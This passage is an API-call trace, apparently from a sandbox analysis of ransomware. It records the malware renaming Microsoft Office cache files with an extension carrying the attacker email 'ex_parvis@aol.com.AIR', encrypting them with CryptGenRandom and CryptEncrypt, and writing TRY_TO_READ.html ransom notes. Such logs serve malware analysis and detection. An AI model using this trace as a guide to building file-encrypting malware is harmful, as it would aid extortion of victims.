lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0133.417] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x708) returned 0x385410 [0133.417] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x708) returned 0x385b20 [0133.417] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.417] ReadFile (in: hFile=0x47c, lpBuffer=0x385410, nNumberOfBytesToRead=0x708, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385410*, lpNumberOfBytesRead=0x2acf9c8*=0x708, lpOverlapped=0x0) returned 1 [0133.417] SetFilePointer (in: hFile=0x47c, lDistanceToMove=-1800, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.417] WriteFile (in: hFile=0x47c, lpBuffer=0x385b20*, nNumberOfBytesToWrite=0x708, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385b20*, lpNumberOfBytesWritten=0x2acf9c8*=0x708, lpOverlapped=0x0) returned 1 [0133.417] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385410 | out: hHeap=0x2e0000) returned 1 [0133.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385b20 | out: hHeap=0x2e0000) returned 1 [0133.418] CloseHandle (hObject=0x47c) returned 1 [0133.418] GetProcessHeap () returned 0x2e0000 [0133.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0133.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0133.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0133.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0133.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0133.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x319d30 [0133.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0133.419] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0133.419] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0133.419] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0133.419] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi", dwFileAttributes=0x80) returned 1 [0133.419] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 75 [0133.419] GetProcessHeap () returned 0x2e0000 [0133.419] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363a50 [0133.419] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" [0133.419] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0133.419] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0133.421] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0133.421] GetProcessHeap () returned 0x2e0000 [0133.421] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0133.421] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2522624) returned 1 [0133.421] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x267e00 [0133.421] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0133.422] GetProcessHeap () returned 0x2e0000 [0133.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0133.422] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0133.422] WriteFile (in: hFile=0x47c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0133.424] WriteFile (in: hFile=0x47c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0133.424] WriteFile (in: hFile=0x47c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0133.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x267e00) returned 0x30d0020 [0133.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x267e00) returned 0x3340020 [0133.425] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.425] ReadFile (in: hFile=0x47c, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x267e00, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x267e00, lpOverlapped=0x0) returned 1 [0133.580] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0133.580] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0133.580] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", dwFileAttributes=0x80) returned 1 [0133.580] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 74 [0133.580] GetProcessHeap () returned 0x2e0000 [0133.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfa) returned 0x363a50 [0133.580] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" [0133.580] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0133.580] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0133.583] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0133.583] GetProcessHeap () returned 0x2e0000 [0133.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0133.583] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=43806141) returned 1 [0133.583] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x29c6dbd [0133.583] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0133.583] GetProcessHeap () returned 0x2e0000 [0133.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0133.583] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0133.583] WriteFile (in: hFile=0x47c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0133.586] WriteFile (in: hFile=0x47c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0133.586] WriteFile (in: hFile=0x47c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0133.586] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x29c6dbd) returned 0x30d0020 [0133.587] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x29c6dbd) returned 0x5aa0020 [0133.588] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.588] ReadFile (in: hFile=0x47c, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x29c6dbd, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x29c6dbd, lpOverlapped=0x0) returned 1 [0136.008] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0136.008] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0136.008] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0136.008] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0136.009] GetProcessHeap () returned 0x2e0000 [0136.009] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x319c88 [0136.009] lstrcpyW (in: lpString1=0x319c88, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" [0136.009] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0136.009] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0136.011] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0136.011] GetProcessHeap () returned 0x2e0000 [0136.011] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319c88 | out: hHeap=0x2e0000) returned 1 [0136.011] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2424) returned 1 [0136.011] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x978 [0136.011] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0136.011] GetProcessHeap () returned 0x2e0000 [0136.011] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0136.011] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0136.011] WriteFile (in: hFile=0x47c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0136.013] WriteFile (in: hFile=0x47c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0136.013] WriteFile (in: hFile=0x47c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0136.013] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x978) returned 0x385368 [0136.013] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x978) returned 0x385ce8 [0136.013] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.013] ReadFile (in: hFile=0x47c, lpBuffer=0x385368, nNumberOfBytesToRead=0x978, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385368*, lpNumberOfBytesRead=0x2acf9c8*=0x978, lpOverlapped=0x0) returned 1 [0136.013] SetFilePointer (in: hFile=0x47c, lDistanceToMove=-2424, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.013] WriteFile (in: hFile=0x47c, lpBuffer=0x385ce8*, nNumberOfBytesToWrite=0x978, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385ce8*, lpNumberOfBytesWritten=0x2acf9c8*=0x978, lpOverlapped=0x0) returned 1 [0136.013] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0136.013] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385ce8 | out: hHeap=0x2e0000) returned 1 [0136.013] CloseHandle (hObject=0x47c) returned 1 [0136.014] GetProcessHeap () returned 0x2e0000 [0136.014] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0136.014] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0136.014] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0136.014] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x312a78 | out: hHeap=0x2e0000) returned 1 [0136.014] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0136.014] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x90) returned 0x344ca0 [0136.014] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0136.014] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328ce8 | out: hHeap=0x2e0000) returned 1 [0136.014] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e4b8 | out: hHeap=0x2e0000) returned 1 [0136.015] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35df58 [0136.015] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.015] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.015] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ce8 [0136.015] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.015] GetLastError () returned 0x0 [0136.015] FindNextFileW (in: hFindFile=0x35df58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0136.015] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.015] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.015] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ce8 [0136.015] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.015] GetLastError () returned 0x0 [0136.015] FindNextFileW (in: hFindFile=0x35df58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0136.015] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.015] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.015] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ce8 [0136.015] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.015] GetLastError () returned 0x0 [0136.015] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x480 [0136.016] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d50 | out: hHeap=0x2e0000) returned 1 [0136.016] WriteFile (in: hFile=0x480, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0136.017] WriteFile (in: hFile=0x480, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0136.017] WriteFile (in: hFile=0x480, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0136.017] CloseHandle (hObject=0x480) returned 1 [0136.017] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319c88 | out: hHeap=0x2e0000) returned 1 [0136.017] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383db0 | out: hHeap=0x2e0000) returned 1 [0136.017] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0136.017] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x312a78 | out: hHeap=0x2e0000) returned 1 [0136.017] FindNextFileW (in: hFindFile=0x35df58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0136.017] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.017] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.017] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328ce8 [0136.017] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.017] GetLastError () returned 0x0 [0136.018] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x480 [0136.018] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0136.018] WriteFile (in: hFile=0x480, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0136.019] WriteFile (in: hFile=0x480, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, 